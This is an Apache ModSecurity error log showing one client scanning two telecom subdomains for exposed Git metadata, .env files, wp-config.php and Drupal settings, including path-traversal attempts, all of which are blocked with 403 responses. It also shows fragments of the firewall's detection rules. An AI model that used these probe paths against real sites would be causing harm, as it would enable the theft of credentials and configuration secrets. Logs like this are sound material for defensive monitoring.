[Mon May 11 15:23:16.293844 2026] [security2:error] [pid 1319998:tid 1320006] [client 195.178.110.133:3430] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKt2WtvoFr7xvGzUigAAAIY"]
[Mon May 11 15:23:16.294052 2026] [security2:error] [pid 1319998:tid 1320006] [client 195.178.110.133:3430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.git/HEAD"] [unique_id "agHYRKt2WtvoFr7xvGzUigAAAIY"]
[Mon May 11 15:23:16.295118 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRFchVQ3tCn0m9OpZRQAAAQ4"]
[Mon May 11 15:23:16.295332 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRFchVQ3tCn0m9OpZRQAAAQ4"]
[Mon May 11 15:23:16.295535 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:3316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYRFchVQ3tCn0m9OpZRQAAAQ4"]
[Mon May 11 15:23:16.295678 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY2QAAAA0"]
[Mon May 11 15:23:16.295801 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY2QAAAA0"]
[Mon May 11 15:23:16.295980 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY2QAAAA0"]
[Mon May 11 15:23:16.296241 2026] [core:error] [pid 1320674:tid 1320691] [client 195.178.110.133:3238] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:16.296365 2026] [proxy_fcgi:error] [pid 1319886:tid 1319901] [client 195.178.110.133:3242] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:16.296907 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYROJEyNRN152ArOSM-gAAAEk"]
[Mon May 11 15:23:16.297032 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYROJEyNRN152ArOSM-gAAAEk"]
[Mon May 11 15:23:16.297248 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.133:3348] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYROJEyNRN152ArOSM-gAAAEk"]
[Mon May 11 15:23:16.297287 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRKy-5-wpj6Sx56aY2gAAAAs"]
[Mon May 11 15:23:16.297406 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRKy-5-wpj6Sx56aY2gAAAAs"]
[Mon May 11 15:23:16.297591 2026] [security2:error] [pid 1319886:tid 1319916] [client 195.178.110.133:3272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYRKy-5-wpj6Sx56aY2gAAAAs"]
[Mon May 11 15:23:16.297801 2026] [security2:error] [pid 1319886:tid 1319911] [client 195.178.110.133:3402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY1wAAAAg"]
[Mon May 11 15:23:16.298085 2026] [security2:error] [pid 1319886:tid 1319911] [client 195.178.110.133:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY1wAAAAg"]
[Mon May 11 15:23:16.300726 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:3458] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRKO9RdIr1DwxYR2S6AAAAMY"]
[Mon May 11 15:23:16.300927 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:3458] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYRKO9RdIr1DwxYR2S6AAAAMY"]
[Mon May 11 15:23:16.300938 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /storage/app/../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM_QAAAFU"]
[Mon May 11 15:23:16.301000 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM_QAAAFU"]
[Mon May 11 15:23:16.301104 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM_QAAAFU"]
[Mon May 11 15:23:16.301313 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:3382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYROJEyNRN152ArOSM_QAAAFU"]
[Mon May 11 15:23:16.302010 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYRFchVQ3tCn0m9OpZRgAAARA"]
[Mon May 11 15:23:16.302134 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYRFchVQ3tCn0m9OpZRgAAARA"]
[Mon May 11 15:23:16.302287 2026] [security2:error] [pid 1319953:tid 1319969] [client 195.178.110.133:3308] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYROSQ-m-m0ukSShuCHQAAAU4"]
[Mon May 11 15:23:16.302342 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:3340] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYRFchVQ3tCn0m9OpZRgAAARA"]
[Mon May 11 15:23:16.302839 2026] [security2:error] [pid 1319998:tid 1320018] [client 195.178.110.133:3362] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYRKt2WtvoFr7xvGzUjAAAAJI"]
[Mon May 11 15:23:16.303017 2026] [security2:error] [pid 1319998:tid 1320018] [client 195.178.110.133:3362] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agHYRKt2WtvoFr7xvGzUjAAAAJI"]
[Mon May 11 15:23:16.301601 2026] [security2:error] [pid 1320674:tid 1320713] [client 195.178.110.133:3288] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRKO9RdIr1DwxYR2S6QAAANg"]
[Mon May 11 15:23:16.303652 2026] [security2:error] [pid 1320674:tid 1320713] [client 195.178.110.133:3288] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYRKO9RdIr1DwxYR2S6QAAANg"]
[Mon May 11 15:23:16.304802 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRKt2WtvoFr7xvGzUjQAAAIs"]
[Mon May 11 15:23:16.304992 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRKt2WtvoFr7xvGzUjQAAAIs"]
[Mon May 11 15:23:16.305299 2026] [security2:error] [pid 1319998:tid 1320011] [client 195.178.110.133:3354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agHYRKt2WtvoFr7xvGzUjQAAAIs"]
[Mon May 11 15:23:16.313755 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.133:3242] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRKy-5-wpj6Sx56aY3AAAAAI"]
[Mon May 11 15:23:16.313940 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.133:3242] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYRKy-5-wpj6Sx56aY3AAAAAI"]
[Mon May 11 15:23:16.314277 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY3QAAAA0"]
[Mon May 11 15:23:16.314436 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:3370] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHYRKy-5-wpj6Sx56aY3QAAAA0"]
